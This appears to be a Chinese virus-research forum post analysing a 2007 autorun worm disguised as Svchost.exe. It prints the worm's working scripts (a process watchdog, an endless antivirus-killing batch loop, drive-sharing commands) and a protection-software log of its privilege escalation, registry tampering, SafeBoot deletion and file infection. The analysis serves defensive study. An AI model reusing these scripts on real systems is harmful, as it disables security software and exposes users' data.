Analyst Expert
查看詳細資料
TOP
on error resume next set Ws = CreateObject("wscript.Shell") count=0 for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ if ps.name="wscript.exe"then count=count+1 next if count > 2 then wscript.quit i=1 for i = 1 to 3 i=i-1 WScript.Sleep(2000) strProcess = "Svchost.exe" Proce = false For each x in getobject("winmgmts:").instancesof("win32_process") If ucase(x.name) = ucase(strProcess) then Proce = true Exit For End If Next If Proce=false then Ws.run "D:\\Svchost.exe" WScript.Quit else WScript.Quit End If next
@echo off :k Set p=taskkill /f /im /t sc config winmgmt start= AUTO & net start winmgmt %p% RavMonD.exe %p% RavStub.exe %p% Anti* %p% AgentSvr* %p% CCenter* %p% Rsaupd* %p% SmartUp* %p% FileDsty* %p% RegClean* %p% 360tray* %p% 360safe* %p% kabaload* %p% safelive* %p% KASTask* %p% kpFW32* %p% kpFW32X* %p% KvXP_1* %p% KVMonXP_1* %p% KvReport* %p% KvXP* %p% KVMonXP* %p% nter* %p% TrojDie* %p% avp.com %p% KRepair.COM %p% Trojan* %p% KvNative* %p% Virus* %p% Filewall* %p% Kaspersky* %p% JiangMin* %p% RavMonD* %p% RavStub* %p% RavTask* %p% adam* %p% cSet* %p% PFWliveUpdate* %p% mmqczj* %p% Trojanwall* %p% Ras.exe %p% runiep.exe %p% avp.exe %p% PFW.exe %p% rising* %p% ikaka* %p% .duba* %p% kingsoft* %p% 木马* %p% 社区* %p% aswBoot* %p% MainCon* %p% Regs* %p% AVP* %p% Task* %p% regedit* %p% Ras* %p% srgui* %p% norton* %p% avp* %p% fire* %p% spy* %p% bullguard* %p% PersFw* %p% KAV* %p% ZONEALARM* %p% SAFEWEB* %p% OUTPOST* %p% ESAFE* %p% clear* %p% BLACKICE* %p% 360safe.exe %p% Shadowservice.exe %p% v3webnt.exe %p% v3sd32.exe %p% v3monsvc.exe %p% sysmonnt.exe %p% hkcmd.exe %p% DNTUS26.EXE %p% AhnSD.exe %p% CTFMON.EXE %p% MonsysNT.exe %p% awrem32.exe %p% WINAW32.EXE %p% PNTIOMON.exe %p% avgw.exe %p% avgcc32.exe %p% PROmon.exe %p% PNTIOMON.exe %p% MagicSet.exe %p% MainCon.exe %p% TrCleaner.exe %p% WmNetPro.exe %p% 修复* %p% 保护* goto k
net share A=A: net share B=B: net share C=C: net share D=D: net share E=E: net share F=F: net share G=G: net share H=H: net share I=I: net share J=J: net share K=K: net share L=L: net share M=M: net share N=N: net share O=O: net share P=P: net share Q=Q: net share R=R: net share S=S: net share T=T: net share U=U: net share V=V: net share W=W: net share X=X: net share Y=Y: net share Z=Z:
2007-12-24 09:18:48 執行應用程序 操作:允許 程序路徑:C:\WINDOWS\Explorer.EXE 檔案路徑:D:\Svchost.exe 觸發規則:所有程序規則->系統程式_黑名單->?:\* 2007-12-24 09:18:51 執行應用程序 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\explorer.exe 指令列:D:\ 觸發規則:所有程序規則->系統程式_白名單->%windir%\explorer.exe 2007-12-24 09:19:09 執行應用程序 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\cmd.exe 指令列:/c sc config winmgmt start= AUTO & net start winmgmt & quit 觸發規則:所有程序規則->系統程式_黑名單->*\cmd.exe 2007-12-24 09:19:11 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\Taskeep.vbs 觸發規則:所有程序規則->全域設定_可執行檔案3_普通模式->%SystemDrive%\*.vbs 2007-12-24 09:19:16 執行應用程序 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\Rundll32.exe 指令列:url.dll, FileProtocolHandler C:\WINDOWS\system32\Taskeep.vbs 觸發規則:所有程序規則->* 2007-12-24 09:19:19 執行應用程序 操作:封鎖 程序路徑:C:\WINDOWS\system32\Rundll32.exe 檔案路徑:C:\WINDOWS\System32\WScript.exe 指令列:"C:\WINDOWS\system32\Taskeep.vbs" 觸發規則:所有程序規則->系統程式_黑名單->%windir%\system32\wscript.exe 2007-12-24 09:19:22 存取實體記憶體 操作:封鎖 程序路徑:D:\Svchost.exe 觸發規則:所有程序規則->*
2007-12-24 09:19:24 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\SDGames.exe 觸發規則:所有程序規則->全域設定_可執行檔案1_普通模式->*.exe 2007-12-24 09:19:28 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\Avpser.cmd 觸發規則:所有程序規則->全域設定_可執行檔案1->*.cmd 2007-12-24 09:19:31 執行應用程序 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\cmd.exe 指令列:/c C:\WINDOWS\system32\Avpser.cmd 觸發規則:所有程序規則->系統程式_黑名單->*\cmd.exe 2007-12-24 09:19:33 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\netshare.cmd 觸發規則:所有程序規則->全域設定_可執行檔案1->*.cmd
2007-12-24 09:19:36 執行應用程序 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\net.exe 指令列:user guest /add 觸發規則:所有程序規則->系統程式_黑名單->%windir%\system32\net*.exe 2007-12-24 09:19:38 執行應用程序 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\net.exe 指令列:user guest /active 觸發規則:所有程序規則->系統程式_黑名單->%windir%\system32\net*.exe 2007-12-24 09:19:40 執行應用程序 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\net.exe 指令列:user guest " 觸發規則:所有程序規則->系統程式_黑名單->%windir%\system32\net*.exe 2007-12-24 09:19:42 執行應用程序 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\net.exe 指令列:localgroup Administrators guest 觸發規則:所有程序規則->系統程式_黑名單->%windir%\system32\net*.exe 2007-12-24 09:19:45 執行應用程序 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\net.exe 指令列:localgroup Guests guest /add 觸發規則:所有程序規則->系統程式_黑名單->%windir%\system32\net*.exe
2007-12-24 09:19:54 建立登錄檔值 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows 登錄檔名稱:run 登錄檔數值:C:\WINDOWS\system32\SDGames.exe 觸發規則:所有程序規則->自動執行->*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows 2007-12-24 09:19:57 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows 登錄檔名稱:load 登錄檔數值:C:\WINDOWS\system32\SDGames.exe 觸發規則:所有程序規則->自動執行->*\Software\Microsoft\Windows nt\Currentversion\Windows 2007-12-24 09:20:03 修改檔案 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system.ini 觸發規則:所有程序規則->全域設定_普通模式->* 2007-12-24 09:20:06 修改系統時間 操作:封鎖 程序路徑:D:\Svchost.exe 觸發規則:所有程序規則->* 2007-12-24 09:20:13 建立登錄檔值 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System 登錄檔名稱:DisableCMD 觸發規則:所有程序規則->其他重要項目->*\Software\Policies* 2007-12-24 09:20:27 建立登錄檔值 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_USERS\S-1-5-21-2000478354-842925246-1202660629-500\Software\Policies\Microsoft\Windows\System 登錄檔名稱:[Key] 觸發規則:所有程序規則->其他重要項目->*\Software\Policies* 2007-12-24 09:20:32 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center 登錄檔名稱:AntiVirusOverride 觸發規則:所有程序規則->其他重要項目->HKEY_LOCAL_MACHINE\Software\Microsoft\Security center
2007-12-24 09:20:35 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced 登錄檔名稱:Hidden 觸發規則:所有程序規則->檔案總管->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced* 2007-12-24 09:20:36 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL 登錄檔名稱:CheckedValue 觸發規則:所有程序規則->檔案總管->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced* 2007-12-24 09:20:38 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced 登錄檔名稱:HideFileExt 觸發規則:所有程序規則->檔案總管->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced*
2007-12-24 09:20:42 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CLASSES_ROOT\txtfile\shell\open\command 登錄檔名稱:[Default] 觸發規則:所有程序規則->檔案類型關聯->HKEY_CLASSES_ROOT\*file\shell\*\command* 2007-12-24 09:20:48 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CLASSES_ROOT\regfile\shell\open\command 登錄檔名稱:[Default] 觸發規則:所有程序規則->檔案類型關聯->HKEY_CLASSES_ROOT\*file\shell\*\command*
2007-12-24 09:20:52 建立登錄檔值 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 登錄檔名稱:NoFolderOptions 觸發規則:所有程序規則->其他重要項目->*\Software\Microsoft\Windows\Currentversion\Policies* 2007-12-24 09:20:55 建立登錄檔值 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 登錄檔名稱:NoControlPanel 觸發規則:所有程序規則->其他重要項目->*\Software\Microsoft\Windows\Currentversion\Policies* 2007-12-24 09:20:57 建立登錄檔值 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 登錄檔名稱:NoSetTaskbar 觸發規則:所有程序規則->其他重要項目->*\Software\Microsoft\Windows\Currentversion\Policies* 2007-12-24 09:21:00 建立登錄檔值 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 登錄檔名稱:DisableRegistrytools 觸發規則:所有程序規則->其他重要項目->*\Software\Microsoft\Windows\Currentversion\Policies* 2007-12-24 09:21:02 建立登錄檔值 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 登錄檔名稱:DisableTaskMgr 觸發規則:所有程序規則->其他重要項目->*\Software\Microsoft\Windows\Currentversion\Policies* 2007-12-24 09:21:05 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 登錄檔名稱:ShutdownWithoutLogon 觸發規則:所有程序規則->WinLogon->*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon* 2007-12-24 09:21:08 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer 登錄檔名稱:EnableAdminTSRemote 觸發規則:所有程序規則->其他重要項目->*\Software\Policies*
2007-12-24 09:21:16 載入驅動程序 操作:封鎖 程序路徑:C:\WINDOWS\system32\svchost.exe 裝置名稱:tdtcp 觸發規則:所有程序規則->* 2007-12-24 09:21:26 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 登錄檔名稱:Start Page 登錄檔數值:http://www.zhidaobaidu.10mb.cn/ 觸發規則:所有程序規則->IE瀏覽器設定->*\Software\Microsoft\Internet explorer\Main 2007-12-24 09:21:30 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main 登錄檔名稱:Start Page 登錄檔數值:wangma 觸發規則:所有程序規則->IE瀏覽器設定->*\Software\Microsoft\Internet explorer\Main 2007-12-24 09:21:33 建立登錄檔值 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main 登錄檔名稱:Default_Page_URL 登錄檔數值:wangma 觸發規則:所有程序規則->IE瀏覽器設定->*\Software\Microsoft\Internet explorer\Main 2007-12-24 09:21:35 修改登錄檔內容 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main 登錄檔名稱:Default_Page_URL 登錄檔數值:wangma 觸發規則:所有程序規則->IE瀏覽器設定->*\Software\Microsoft\Internet explorer\Main
2007-12-24 09:21:39 刪除登錄檔 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal 登錄檔名稱:{4D36E967-E325-11CE-BFC1-08002BE10318} 觸發規則:所有程序規則->系統設定->HKEY_LOCAL_MACHINE\SYSTEM\*controlset*\Control\Safeboot* 2007-12-24 09:21:41 刪除登錄檔 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network 登錄檔名稱:{4D36E967-E325-11CE-BFC1-08002BE10318} 觸發規則:所有程序規則->系統設定->HKEY_LOCAL_MACHINE\SYSTEM\*controlset*\Control\Safeboot*
2007-12-24 09:21:48 建立登錄檔值 操作:封鎖 程序路徑:D:\Svchost.exe 登錄檔路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe 登錄檔名稱:[Key] 觸發規則:所有程序規則->其他重要項目->*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options* 開始 建立 IFEO 的登錄檔
2007-12-24 09:22:50 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\AUTORUN.INF 觸發規則:所有程序規則->全域設定_普通模式->* 2007-12-24 09:23:03 執行應用程序 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\cmd.exe 指令列:/c rd /s /q A:\AUTORUN.INF 觸發規則:所有程序規則->系統程式_黑名單->*\cmd.exe 再來,開始從A~Z,每個都做一次
2007-12-24 09:23:39 執行應用程序 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\cmd.exe 指令列:/c rd /s /q C:\AUTORUN.INF 觸發規則:應用程序規則->自動建立規則->D:\Svchost.exe->C:\WINDOWS\system32\cmd.exe 2007-12-24 09:24:17 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\SDGames.exe 觸發規則:所有程序規則->全域設定_可執行檔案1_普通模式->*.exe 2007-12-24 09:24:23 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\Windows.url 觸發規則:所有程序規則->全域設定_普通模式->* 2007-12-24 09:24:24 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\Recycleds.url 觸發規則:所有程序規則->全域設定_普通模式->* 2007-12-24 09:24:24 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\新建文件夹.url 觸發規則:所有程序規則->全域設定_普通模式->* 2007-12-24 09:24:27 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:C:\AUTORUN.INF 觸發規則:所有程序規則->白名單與黑名單->?:\autorun.inf 2007-12-24 09:24:29 執行應用程序 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:C:\WINDOWS\system32\cmd.exe 指令列:/c rd /s /q D:\AUTORUN.INF 觸發規則:應用程序規則->自動建立規則->D:\Svchost.exe->C:\WINDOWS\system32\cmd.exe 2007-12-24 09:24:30 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:D:\SDGames.exe 觸發規則:所有程序規則->全域設定_可執行檔案1_普通模式->*.exe 2007-12-24 09:24:34 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:D:\Windows.url 觸發規則:所有程序規則->全域設定_普通模式->* 2007-12-24 09:24:35 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:D:\Recycleds.url 觸發規則:所有程序規則->全域設定_普通模式->* 2007-12-24 09:24:36 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:D:\新建文件夹.url 觸發規則:所有程序規則->全域設定_普通模式->* 2007-12-24 09:24:43 建立檔案 操作:允許 程序路徑:D:\Svchost.exe 檔案路徑:D:\AUTORUN.INF 觸發規則:所有程序規則->白名單與黑名單->?:\autorun.inf
2007-12-24 09:25:28 修改檔案 操作:封鎖 程序路徑:D:\Svchost.exe 檔案路徑:D:\Memory\國立清華大學096學年度上學期註冊費收據.htm 觸發規則:所有程序規則->全域設定_普通模式->* 開始感染 .htm 檔案
反病毒 反詐騙 反虐犬
病毒研究室領導
高級會員
原帖由 upside 於 2007-12-24 11:47 發表 嗯 初號機的圖比較漂亮 抓出來給大家用囉 雖說初號機 但看檔案版本 已經到 FileVersion", "3.02"
ㄚ光
病毒研究室成員
